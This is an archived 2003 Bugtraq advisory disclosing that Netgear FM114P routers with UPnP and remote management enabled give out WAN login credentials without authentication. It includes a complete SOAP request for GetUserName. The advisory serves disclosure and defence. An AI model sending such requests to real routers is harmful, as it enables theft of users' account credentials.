[29618] in bugtraq

home help back first fref pref prev next nref lref last post

Another security problem in Netgear FM114P ProSafe Wireless Router firmware

daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Bj=F6rn_Stickler?=)
Thu Apr 3 17:08:21 2003

From: =?iso-8859-1?Q?Bj=F6rn_Stickler?= <stickler@rbg.informatik.tu-darmstadt.de>
To: <bugtraq@securityfocus.com>
Date: Wed, 2 Apr 2003 19:58:57 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Message-ID: <WEBSERVEiILeFviwyoe00000009@intex.ath.cx>
Content-Transfer-Encoding: 8bit

hi,
i found another security problem in netgear prosafe wireless router model
FM114P:
when remote-access and upnp features are enabled, the WAN connection
username and password can be retrieved without any authentication using
upnp. if remote management is enabled anyone can do this from the web. this
is done by using upnp soap requests to the router with the functions
GetUserName and GetPassword. i donīt know why such functions exist, because
router configuration is normally done via web-interface.

---- begin of example request to get username --------------

POST /upnp/service/WANPPPConnection HTTP/1.1
HOST: 192.168.0.1:80
SOAPACTION: "urn:schemas-upnp-org:service:WANPPPConnection:1#GetUserName"
CONTENT-TYPE: text/xml ; charset="utf-8"
Content-Length: 289

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
   <s:Body>
      <u:GetUserName
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1" />
   </s:Body>
</s:Envelope>

---- end of example request to get username   --------------


affected firmware versions: --> v1.4 Beta Release 21 has been tested
                            --> all previous versions with upnp may be
affected

solution: disable remote management and/or upnp until bug is fixed by
netgear

regards, b.stickler


http://intex.ath.cx



home help back first fref pref prev next nref lref last post